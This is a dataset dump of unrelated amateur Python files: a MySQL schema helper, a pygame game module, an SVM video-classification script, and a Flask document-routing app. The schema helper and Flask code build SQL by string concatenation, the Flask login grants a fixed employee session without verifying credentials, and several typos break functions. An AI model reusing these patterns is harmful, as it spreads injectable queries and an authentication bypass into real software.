if not self.table_exists(table):\n raise SchemaNotExistException(\n \"Cannot rename %s to %s: table %s doesn't exist.\" % (table, new_name, table))\n\n if self.table_exists(new_name):\n raise SchemaNotExistException(\n \"Cannot rename %s to %s: table %s doesn't exist.\" % (table, new_name, table))\n\n info = self.get_prefix_info(new_name)\n return self.connection.query('ALTER TABLE ' + table + ' RANAME TO `' + info['table'] + '`')\n\n def drop_table(self, table):\n if not self.table_exists(table):\n return False\n self.connection.query('DROP TABLE ' + table)\n return True\n\n def add_field(self, table, field, spec={}, keys_new={}):\n if not self.table_exists(table):\n raise SchemaNotExistException(\n \"Cannot add field %s.%s: table doesn't exist.\" % (table, field))\n\n if self.field_exists(table, field):\n raise SchemaExistsException(\n \"Cannot add field %s.%s: field already exists.\" % (table, field))\n\n fixnull = False\n if spec.get('not null') and not spec.get('defalut'):\n fixnull = True\n spec['not null'] = False\n query = 'ALTER TABLE ' + table + ' ADD '\n query += self.create_field_sql(field, self.process_field(spec))\n keys_sql = self.create_keys_sql(keys_new)\n if keys_sql:\n query += ', ADD ' + ', ADD '.join(keys_sql)\n res = self.connection.query(query)\n if spec.get('initial'):\n res = self.connection.update(table).fields(\n fields=spec['initial']).execute()\n\n if fixnull:\n spec['not null'] = True\n res = self.change_field(table, field, field, spec)\n return bool(res)\n\n def drop_field(self, table, field):\n if not self.field_exists(table, field):\n return False\n\n self.connection.query('ALTER TABLE `' + table + '` DROP `' + field + '`')\n return True\n\n def field_set_default(self, table, field, default):\n if not self.table_exists(table, field):\n raise SchemaNotExistException(\n \"Cannot set default value of field %s.%s: field already exists.\" % (table, field))\n if not defalut:\n default = 'NULL'\n\n self.connection.query('ALTER TABLE ' + table +\n ' ALTER COLUMN `' + field + '` SET DEFAULT ' + default)\n\n def field_set_no_default(table, field):\n if not self.table_exists(table, field):\n raise SchemaNotExistException(\n \"Cannot remove default value of field %s.%s: field already exists.\" % (table, field))\n self.connection.query('ALTER TABLE ' + table +\n ' ALTER COLUMN `' + field + '` DROP DEFAULT')\n\n def index_exists(self, table, name):\n row = self.connection.query(\n 'SHOW INDEX FROM ' + table + \"WHERE key_name = '%s'\" % (name)).fetch_assoc()\n return bool(row.get('key_name'))\n\n def add_primary_key(self, table, fields):\n if not self.table_exists(table):\n raise SchemaNotExistException(\n \"Cannot add primary key to table %s: table doesn't exist.\" % (table))\n\n if self.index_exists(table, 'PRIMARY'):\n raise SchemaNotExistException(\n \"Cannot add primary key to table %s: primary key already exists.\" % (table))\n\n self.connection.query('ALTER TABLE ' + table +\n ' ADD PRIMARY KEY (' + self.create_key_sql(field) + ')')\n\n def drop_primary_key(self, table):\n if not self.index_exists(table, 'PRIMARY'):\n return False\n self.connection.query('ALTER TABLE ' + table + ' DROP PRIMARY KEY')\n return True\n\n def add_unique_key(self, table, name, fields):\n if not self.table_exists(table):\n raise SchemaNotExistException(\n \"Cannot add unique key %s to to table %s: table doesn't exist.\" % (name, table))\n\n if self.index_exists(table, name):\n raise SchemaNotExistException(\n \"Cannot add unique key %s to table %s: unique key already exists.\" % (name, table))\n\n self.connection.query('ALTER TABLE ' + table + ' ADD UNIQUE KEY `' +\n name + '` (' + self.create_key_sql(fields) + ')')\n\n def drop_unique_key(self, table, name):\n if not self.index_exists(table, name):\n return False\n self.connection.query(\n 'ALTER TABLE ' + table + ' DROP KEY `' + name + '`')\n return True\n\n def add_index(self, table, name, fields):\n if not self.table_exists(table):\n raise SchemaNotExistException(\n \"Cannot add index %s to to table %s: table doesn't exist.\" % (name, table))\n\n if self.index_exists(table, name):\n raise SchemaNotExistException(\n \"Cannot add index key %s to table %s: index already exists.\" % (name, table))\n self.connection.query('ALTER TABLE ' + table + ' ADD INDEX `' +\n name + '` (' + self.create_key_sql(fields) + ')')\n\n def drop_index(self, table, name):\n if not self.index_exists(table, name):\n return False\n self.connection.query(\n 'ALTER TABLE ' + table + ' DROP INDEX `' + name + '`')\n return True\n\n def change_field(self, table, field, field_new, spec, keys_new={}):\n if not self.table_exists(table):\n raise SchemaNotExistException(\n \"Cannot change the definition of field table %s.%s: field doesn't exist.\" % (table, field))\n\n if field != field_new and self.field_exists(table, field_new):\n raise SchemaNotExistException(\n \"Cannot rename field %s.%s to %s: target field already exists.\" % (table, field, field_new))\n\n sql = 'ALTER TABLE ' + table + ' CHANGE `' + field + '` ' + \\\n self.create_field_sql(field_new, self.process_field(spec))\n keys_sql = self.create_keys_sql(keys_new)\n if keys_sql:\n sql += ', ADD' + ', ADD '.join(keys_sql)\n self.connection.query(sql)\n return True\n\n def prepare_comment(self, comment, length=None):\n comment = comment.replace(\"'\", ',')\n if not length:\n comment = truncate_utf8(\n self.connection.prefix_tables(comment), length, True, True)\n return \"'%s'\" % self.connection.quote(comment)\n\n def get_comment(self, table, column=None):\n condition = self.build_table_named_condition(table)\n if column:\n condition.condition('column_name', column)\n condition.compile(self.connection, self)\n return self.connection.query(\"SELECT column_comment FROM information_schema.columns WHERE \" +\n condition.to_sql(), condition.arguments()).fetch_field()\n condition.compile(self.connection, self)\n comment = self.connection.query(\"SELECT column_comment FROM information_schema.columns WHERE \" +\n condition.to_sql(), condition.arguments()).fetch_field()\n import re\n return re.sub(r'/; InnoDB free:.*$/', r'', comment)\n\n def table_exists(self, table):\n try:\n self.connection.query_range('SELECT 1 FROM ' + table, 1, 0)\n return True\n except:\n return False\n\n def field_exists(self, table, column):\n try:\n logging.debug('filed exists check...')\n self.connection.query_range('SELECT %s FROM ' %\n (column) + table, 1, 0)\n return True\n except:\n return False\n", "sub_path": "solo/db/mysql/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 13853, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "solo.db.schema.DatabaseSchema", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 99, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 180, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 184, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 198, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 202, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 233, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 243, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 255, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 259, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 273, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 277, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 292, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 296, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 310, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 314, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 343, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 354, "usage_type": "call"}]} +{"seq_id": "584138580", "text": "import pygame\r\nimport os\r\nfrom screen import *\r\n\r\nBOARD_S = 30\r\n\r\npygame.init()\r\ntime = pygame.time.Clock()\r\n\r\nunit_sprites = pygame.sprite.Group()\r\nsprite = pygame.sprite.Sprite()\r\n\r\n\r\ndef win(winer):\r\n screen.fill((0, 0, 0))\r\n\r\n\r\ndef load_image(name, color_key=None):\r\n fullname = os.path.join('data', name)\r\n try:\r\n image = pygame.image.load(fullname).convert()\r\n if color_key is not None:\r\n if color_key == -1:\r\n color_key = image.get_at((0, 0))\r\n image.set_colorkey(color_key)\r\n else:\r\n image = image.convert_alpha()\r\n return image\r\n except pygame.error as message:\r\n print('Cannot load image:', name)\r\n raise SystemExit(message)\r\n\r\n\r\nclass MainUnit:\r\n def __init__(self, screen):\r\n self.name = \"\"\r\n self.atk = 0\r\n self.move = 0\r\n self.coord = [1, 1]\r\n self.x, self.y = self.coord[0] * BOARD_S + 10, self.coord[1] * BOARD_S + 10\r\n self.type = -1\r\n self.atk_range = 0\r\n self.health = 1\r\n self.max_health = 1\r\n self.screen = screen\r\n\r\n def move(self, coord):\r\n pass\r\n\r\n def get_damage(self, damage):\r\n self.health -= damage\r\n if self.health <= 0:\r\n self.dead()\r\n\r\n def put_damage(self, coord):\r\n pass\r\n\r\n def render(self, coord):\r\n pass\r\n\r\n def dead(self):\r\n print(self.x, self.y)\r\n pygame.draw.rect(self.screen, (150, 190, 16), (self.x, self.y, 30, 30))\r\n pygame.display.flip()\r\n print(\"DEAD\")\r\n\r\n\r\nclass WallMg(pygame.sprite.Sprite):\r\n def __init__(self, group, parent):\r\n super().__init__(group)\r\n self.image = parent.image\r\n self.rect = self.image.get_rect()\r\n\r\n\r\nclass Wall(MainUnit):\r\n def __init__(self, coord, screen):\r\n super().__init__(screen)\r\n self.all_sprites = pygame.sprite.Group()\r\n self.name = \"wall\"\r\n self.coord = coord\r\n self.image = load_image(self.name + \".png\")\r\n\r\n def render(self, **kwargs):\r\n # sprite = pygame.sprite.Sprite()\r\n m_wall = WallMg(self.all_sprites, self)\r\n m_wall.rect.x = self.coord[0]\r\n m_wall.rect.y = self.coord[1]\r\n\r\n\r\nclass CastleMgBlue(pygame.sprite.Sprite):\r\n def __init__(self, group, parent):\r\n super().__init__(group)\r\n self.image = parent.image\r\n self.rect = self.image.get_rect()\r\n\r\n\r\nclass CastleBlue(MainUnit):\r\n def __init__(self, coord, screen):\r\n super().__init__(screen)\r\n self.all_sprites = pygame.sprite.Group()\r\n self.name = \"blue_castle\"\r\n self.coord = coord\r\n #\r\n self.health = 15\r\n #\r\n self.max_health = 15\r\n self.image = load_image(self.name + \".png\")\r\n\r\n def render(self, **kwargs):\r\n m_castle = CastleMgBlue(self.all_sprites, self)\r\n m_castle.rect.x = self.coord[0] + 1\r\n m_castle.rect.y = self.coord[1] + 1\r\n\r\n def dead(self):\r\n self.x, self.y = self.coord[0], self.coord[1]\r\n print(self.x, self.y)\r\n pygame.draw.rect(self.screen, (150, 190, 16), (self.x, self.y, 30, 30))\r\n pygame.display.flip()\r\n print(\"DEAD\")\r\n win(\"Red\")\r\n\r\n\r\nclass CastleMgRed(pygame.sprite.Sprite):\r\n def __init__(self, group, parent):\r\n super().__init__(group)\r\n self.image = parent.image\r\n self.rect = self.image.get_rect()\r\n\r\n\r\nclass CastleRed(MainUnit):\r\n def __init__(self, coord, screen):\r\n super().__init__(screen)\r\n self.all_sprites = pygame.sprite.Group()\r\n self.name = \"red_castle\"\r\n self.coord = coord\r\n #\r\n self.health = 15\r\n #\r\n self.max_health = 15\r\n self.image = load_image(self.name + \".png\")\r\n\r\n def render(self, **kwargs):\r\n m_castle = CastleMgRed(self.all_sprites, self)\r\n m_castle.rect.x = self.coord[0] + 1\r\n m_castle.rect.y = self.coord[1] + 1\r\n\r\n def dead(self):\r\n self.x, self.y = self.coord[0], self.coord[1]\r\n pygame.draw.rect(self.screen, (150, 190, 16), (self.x, self.y, 30, 30))\r\n pygame.display.flip()\r\n print(\"DEAD\")\r\n win(\"Blue\")\r\n", "sub_path": "unit.py", "file_name": "unit.py", "file_ext": "py", "file_size_in_byte": 4176, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 11, "usage_type": "attribute"}, {"api_name": "screen.fill", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.error", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 118, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 149, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 150, "usage_type": "attribute"}]} +{"seq_id": "5362513", "text": "from __future__ import print_function\nfrom sklearn.svm import SVC\nfrom sklearn import preprocessing\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import RMSprop\nimport numpy as np\nimport argparse, os\nfrom keras import regularizers\nfrom scipy.stats import mode\nimport logging, time\n\nparser = argparse.ArgumentParser(description='Generate feature map from joints')\nparser.add_argument('--dataset', type=str, default='HMDB51')\nparser.add_argument('--split', type=int, default=1)\nargs = parser.parse_args()\nroot = \"D:/graduation_project/workspace/dataset/\"\ntrain = 'train'+str(args.split)\ntest = 'test'+str(args.split)\n\nlayer = 'block5_pool'\ntrain_spatial_root = root + args.dataset + '_train_test_splits/' + train + '_spatial/'+layer+'/ten1/_1x512/'\ntest_spatial_root = root + args.dataset + '_train_test_splits/' + test + '_spatial/'+layer+'/ten1/_1x512/'\n\nbatch_size = 256\nnum_classes = 51\nepochs = 30\nlevel1 = 512\nlevel2 = 512\nkjud = False\nbjud = False\nwrite_csv = False\n\ndef svc(traindata,trainlabel,testdata,testlabel):\n # beginTime = time.time()\n # min_max_scaler = preprocessing.MinMaxScaler()\n # traindata = min_max_scaler.fit_transform(traindata)\n # testdata = min_max_scaler.transform(testdata)\n # print(\"transform data:\", time.time() - beginTime)\n\n print(\"Start training SVM...\")\n beginTime = time.time()\n svcClf = SVC(C=1,kernel=\"linear\",cache_size=3000, max_iter=500, tol=1)\n svcClf.fit(traindata,trainlabel)\n print(\"SVM training time:\", time.time() - beginTime)\n\n beginTime = time.time()\n pred_trainlabel = svcClf.predict(traindata)\n print(\"predict training time:\", time.time() - beginTime)\n num = len(pred_trainlabel)\n print(pred_trainlabel)\n accuracy = len([1 for i in range(num) if trainlabel[i] == pred_trainlabel[i]]) / float(num)\n print(\"train Accuracy:\", accuracy)\n\n beginTime = time.time()\n pred_testlabel = svcClf.predict(testdata)\n print(\"predict testing time:\", time.time() - beginTime)\n num = len(pred_testlabel)\n print(pred_testlabel)\n accuracy = len([1 for i in range(num) if testlabel[i]==pred_testlabel[i]])/float(num)\n print(\"test Accuracy:\",accuracy)\n\n return svcClf\n\n\ndef load_data(path):\n x = []\n y = []\n file_list = os.listdir(path)\n count = 0\n for file in file_list:\n if '.txt' not in file:\n continue\n file_to_read = open(path + file, 'r')\n tmp = file_to_read.read()\n tmp = tmp.replace('[', '').replace(']','')\n tmpx = [float(i) for i in tmp.split(',')]\n file_to_read.close()\n\n x.append(tmpx)\n y.append(int(file.split('.')[0].split('_')[1]) - 1)\n count+=1\n if count % 500 == 0:\n print(count)\n return np.array(x), np.array(y)\n\ndef preprocess_file_list(lst):\n file_list = []\n for file in lst:\n if '.txt' not in file:\n file_list.append(file)\n return file_list\n\nrec = np.zeros((num_classes, epochs))\nrec2 = np.zeros((epochs, num_classes))\nacc_rec = [0] * epochs\n\ndef evaluate(model, num_epochs, detail=False):\n file_list = preprocess_file_list(os.listdir(test_spatial_root))\n\n correct = 0\n all = len(file_list)\n sta = [0] * 51\n cc = [0] * 51\n count = 0\n for folder in file_list:\n ground_true = int(folder.split('_')[1]) - 1\n sta[ground_true] += 1\n new_path = test_spatial_root + folder + '/'\n test_x, test_y = load_data(new_path)\n\n out = model.predict(test_x)\n Mode = mode(out)[0][0]\n if Mode == ground_true:\n if detail:\n print('\\033[1;33;44m', count, ':', res, Mode, ground_true, '\\033[0m')\n correct += 1.0\n cc[ground_true] += 1\n else:\n if detail:\n print(count, ':', res, Mode, ground_true)\n count += 1\n\n print(correct, all, correct / all)\n acc_rec[num_epochs] = correct / all\n Dict = {}\n for i in range(num_classes):\n rec2[num_epochs][i] = rec[i][num_epochs] = Dict[i] = cc[i] * 1.0 / sta[i]\n Dict = sorted(Dict.items(), key=lambda e: e[1], reverse=True)\n for item in Dict:\n if detail:\n print('%3d, %.3lf, %3d' % (item[0], item[1], sta[item[0]]))\n\n # file_to_write = open(save_name, 'w')\n # file_to_write.write(str(correct / all) + '\\n')\n # for item in Dict:\n # # file_to_write.write(str(item[0]) + '\\t' + str(item[1]) + '\\t' + str(sta[item[0]]) + '\\n')\n # print('%3d %.3lf %3d' % (item[0], item[1], sta[item[0]]), file=file_to_write)\n # file_to_write.close()\n\n\n\nname = 'ten1_' + layer+ '_' + str(args.split) + 'keysorted_spatial_mlp_' + str(level1) + '_' + str(level2) + '_b' + str(batch_size) + '_kr' + str(int(kjud)) + '_br'+str(int(bjud))\n\nx_train, y_train = load_data(train_spatial_root)\n\nx_test, y_test = load_data(test_spatial_root)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\n# y_train = keras.utils.to_categorical(y_train, num_classes)\n# y_test = keras.utils.to_categorical(y_test, num_classes)\nsave_ = './evaluation_statistics/' + name + '/'\nif not os.path.exists(save_):\n os.makedirs(save_)\n\nmodel = svc(x_train,y_train, x_test, y_test)\nevaluate(model, 0)\n\n\nif write_csv:\n file_to_write = open(save_+'epochs_main.csv', 'w')\n print('epochs,', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in range(epochs)]), file=file_to_write)\n print('acc,', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in acc_rec]), file=file_to_write)\n for i in range(num_classes):\n print(str(i)+',',end=\"\", file=file_to_write)\n print(','.join([str(k) for k in rec[i]]), file=file_to_write)\n file_to_write.close()\n\n file_to_write = open(save_+'classes_main.csv', 'w')\n print('epochs,acc,', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in range(num_classes)]), file=file_to_write)\n for i in range(epochs):\n print(str(i) + ',', end=\"\", file=file_to_write)\n print(str(acc_rec[i]) + ',', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in rec2[i]]), file=file_to_write)\n file_to_write.close()\n\n # model.save('./scripts/'+name)\n # score = model.evaluate(x_test, y_test, verbose=0)\n # print('Test loss:', score[0])\n # print('Test accuracy:', score[1])\n", "sub_path": "pre_Feb_work/Main_spatial_svm.py", "file_name": "Main_spatial_svm.py", "file_ext": "py", "file_size_in_byte": 6418, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 101, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "231755750", "text": "from flask import render_template, request, make_response,session\nimport datetime\nfrom app.Controller import Controller\nfrom app import app\nimport pdfkit\nfrom base64 import b64encode\nfrom werkzeug.security import generate_password_hash, \\\n check_password_hash\ncontrol=Controller()\n#index page function\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html')\n#login\n@app.route('/login',methods = ['POST', 'GET'])\ndef loginuser():\n if request.method == 'POST':\n category=request.form['cat']\n username=request.form['username']\n password=request.form['password']\n row=None\n us=None\n id=None\n if category==\"2\":\n row=control.loginUser(username,password)\n for i in row:\n id=i[0]\n row=control.getHostedUsername((id))\n for i in row:\n us=i[0]\n if username==us:\n session['id']=str(id)\n print(session['id'])\n session['name']=us\n return render_template('home2.html',title='Home',name=session['name'])\n else:\n session['id'] = 'EMP01'\n session['name']=control.getUser(session['id'])\n return render_template('home.html',title='Home',name=session['name'])\n return render_template('index.html')\n#it Page function\n@app.route('/it')\ndef it():\n return render_template('it.html', title='IT',name=session['name'])\n#General Application page function\n@app.route('/general_app')\ndef application():\n row=control.getEmpolyees()\n return render_template('writeapp.html', title='General Application' ,id=session['id'],row=row,name=session['name'])\n#Register User Page Function\n@app.route('/register')\ndef register_user():\n if 'name' in session:\n return render_template('register.html', title='Register Researcher',name=session['name'])\n else :\n return render_template('index.html')\n#document Created Detail\n@app.route('/document_created')\ndef document_created():\n row=control.getDocumentCreated(session['id'])\n return render_template('documentCreated.html', title='Document Created By Me', row=row,name=session['name'])\n#document View\n@app.route('/document_view',methods = ['POST', 'GET'])\ndef document_view():\n if request.method == 'POST':\n appid = request.form['appid']\n name=control.getForwardToName(appid)\n row=control.getApplicationDetail(appid)\n row2=control.getForwardtodetail(appid)\n return render_template('documentview.html', title='Document Detail', name1=name,row=row,row2=row2,name=session['name'])\n#document for sign\n@app.route('/document_sign',methods = ['POST', 'GET'])\ndef document_sign():\n row=control.getDocumentToSign(session['id'])\n return render_template('sign.html', title='Document Sign', row=row,name=session['name'])\n#Sign Document\n@app.route('/signed_app',methods = ['POST', 'GET'])\ndef signed_app():\n if request.method=='POST':\n appid=request.form['signapp']\n row=control.getApplicationDetail(appid)\n row2=control.getEmpolyees()\n return render_template('signed_app.html', title='Signed Document', row=row, row2=row2,name=session['name'])\n#save Signed document\n@app.route('/signed_document', methods=['POST','GET'])\ndef document_signed():\n if request.method=='POST':\n appid=request.form['appid']\n comment=request.form['signcomment']\n forward=request.form['signforward']\n action=request.form['signaction']\n designation=control.getEmployeeDesignation(session['id'])\n control.setCommentHistory(appid,comment,forward,action,designation,session['name'])\n row=control.getDocumentToSign(session['id'])\n return render_template('sign.html', title='Document Sign', row=row,name=session['name'])\n#login Request Form\n@app.route('/login_request',methods = ['POST', 'GET'])\ndef login_request():\n row=control.getEmpolyees()\n return render_template('loginrequest.html', title='Login Request', row=row, id=session['id'],name=session['name'])\n#save login Request Form\n@app.route('/login_request_save',methods = ['POST', 'GET'])\ndef save_login_request():\n if request.method=='POST':\n subject=\"Login Request\"\n bilding=request.form['logingbuilding']\n floor=request.form['loginflorr']\n room=request.form['loginroom']\n window=request.form['degree']\n emial_account=request.form['cv']\n print_quota=request.form['cp']\n linux_account=request.form['rl']\n fom=request.form['loginfrom']\n to=request.form['loginto']\n mac=request.form['loginmac']\n purpose=request.form['loginpurpose']\n content=\"Request for window login account: '\"+window+\"' Email Account: '\"+emial_account+\"' Print Quota: '\"+print_quota+\"' and linux ldap account: '\"+linux_account+\"'\"\n forward=request.form['appforward']\n files=request.files.getlist(\"appfile\")\n control.setLoginRequest(subject,bilding,floor,room,window,emial_account,print_quota,linux_account,fom,to,mac,purpose,content,forward,session['id'],files)\n return \"Request forward\"\n#machine request form\n@app.route('/machine_request',methods = ['POST', 'GET'])\ndef machine_request():\n row=control.getEmpolyees()\n return render_template('machine.html', title='Machine Request', row=row, id=session['id'],name=session['name'])\n#save machine request\n@app.route('/save_machine_request',methods=['POST','GET'])\ndef machine_request_save():\n if request.method=='POST':\n subject=\"New Machine Issuance Request\"\n bilding=request.form['machinebuilding']\n floor=request.form['machineflorr']\n room=request.form['machineroom']\n os=request.form['machineos']\n linux_flavour=request.form['machineflavour']\n software=request.form['machinesoftware']\n comment=request.form['machinecomment']\n content=\"Request for new machine, with operating system '\"+os+\"' and including softwares: '\"+software+\"'\"\n forward=request.form['appforward']\n files = request.files.getlist(\"appfile\")\n control.setMacineRequest(subject,bilding,floor,room,linux_flavour,comment,content,forward,session['id'],software,os,files)\n return \"Request forward\"\n#Network Request Form\n@app.route('/network_request',methods = ['POST', 'GET'])\ndef network_request():\n row=control.getEmpolyees()\n return render_template('networkreq.html', title='Network Request', row=row, id=session['id'],name=session['name'])\n#save network request form\n@app.route('/save_network_request',methods=['POST','GET'])\ndef network_request_save():\n if request.method=='POST':\n subject=\"Network Connection Request\"\n bilding=request.form['logingbuilding']\n floor=request.form['loginflorr']\n room=request.form['loginroom']\n fom=request.form['nfrom']\n to=request.form['nto']\n content=\"Netowk Connection Required at Building: '\"+bilding+\"', Floor: '\"+floor+\"' and Room: '\"+room+\"'\"\n forward = request.form['appforward']\n control.setNetwokRequest(subject,bilding,floor,room,fom,to,content,forward,session['id'])\n return \"Request Forward\"\n#print Quota Request Form\n@app.route('/print_request',methods = ['POST', 'GET'])\ndef print_request():\n row=control.getEmpolyees()\n return render_template('print.html', title='Print Request', row=row, id=session['id'],name=session['name'])\n#print Qouta Request Save\n@app.route('/save_print_request',methods=['POST','GET'])\ndef print_request_save():\n if request.method=='POST':\n subject=\"Print Quota Request\"\n pages=request.form['pages']\n content=\"Request to add the '\"+pages+\"' pages to my account\"\n forward=request.form['appforward']\n control.setPrintRequest(subject,pages,content,forward,session['id'])\n return \"Request Forward\"\n#Mail Request Form\n@app.route('/mail_request',methods = ['POST', 'GET'])\ndef mail_request():\n row=control.getEmpolyees()\n return render_template('mailqu.html', title='Mail Request', id=session['id'], row=row,name=session['name'])\n#Mail Quota Request Form save\n@app.route('/save_mail_request',methods=['POST','GET'])\ndef mail_request_save():\n if request.method=='POST':\n subject=\"Mail Quota Request\"\n gb=request.form['mail']\n content=\"Request to add the '\"+gb+\"' GB to my account for mail.\"\n forward=request.form['appforward']\n control.setMailRequest(subject,gb,content,forward,session['id'])\n return \"Request Forward\"\n#Passworf Reset Form\n@app.route('/passwordreset_request',methods = ['POST', 'GET'])\ndef passwordreset_request():\n row=control.getEmpolyees()\n return render_template('passwordreset.html', title='Password Reset Request', row=row, id=session['id'],name=session['name'])\n#Save Password Reset Request\n@app.route('/save_password_reset_request',methods=['POST','GET'])\ndef password_reset_request_save():\n if request.method=='POST':\n subject=\"Password Reset Request\"\n content=request.form['reason']\n forward=request.form['appforward']\n control.setPasswordResetRequest(subject,content,forward,session['id'])\n return \"Request Forward\"\n#Save Application function\n@app.route('/save_app',methods=['POST', 'GET'])\ndef save_application():\n if request.method=='POST':\n subject=request.form['appsub']\n content=request.form['appcontent']\n forward=request.form['appforward']\n name=control.getEmployeeid(forward)\n print(name)\n files=request.files.getlist(\"appfile\")\n control.setGeneralApplication(subject,content,name,session['id'],files)\n return \"Request Forward\"\n@app.route('/register_hosted', methods=['POST','GET'])\n#save hosted researcher record\ndef hosted_register():\n if request.method == 'POST':\n\n name = request.form['regname']\n dob=request.form['regdob']\n cnic=request.form['regcnic']\n qualification=request.form['regqua']\n #qualification2=request.form['reqqother']\n\n province = request.form['hrp']\n city = request.form['hrc']\n\n academic_record=request.form['regacad']\n present_status=request.form['regps']\n #present_status2=request.form['reqpother']\n\n designation=request.form['regpd']\n enrollemnt_no=request.form['regpe']\n uni=request.form['reguni']\n department=request.form['regud']\n permanent_address=request.form['regpa']\n mailing_address=request.form['regma']\n landline=request.form['regln']\n cell=request.form['regc']\n email=request.form['regem']\n researcher_category=request.form['regrc']\n department_NCP=request.form['regdncp']\n duration_NCP=request.form['regncpduration']\n supervisor_from_NCP=request.form['regncpsup']\n cosupervisor_from_NCP=request.form['regncpcosup']\n supervisor_name=request.form['hrsn']\n supervisor_department=request.form['hrsnd']\n tendate=request.form['tendate']\n gender=request.form['hrg']\n picture=request.files['regpicture']\n\n print(\"ahmad\")\n if qualification == \"Others\" and present_status !=\"Others\":\n control.setHostedResearcher(name,dob,cnic,qualification2,academic_record,present_status,designation,enrollemnt_no,uni,department,permanent_address,mailing_address,landline,cell,email,researcher_category,department_NCP,duration_NCP,supervisor_from_NCP,cosupervisor_from_NCP,picture,supervisor_name,supervisor_department,tendate,gender,province,city)\n\n elif present_status 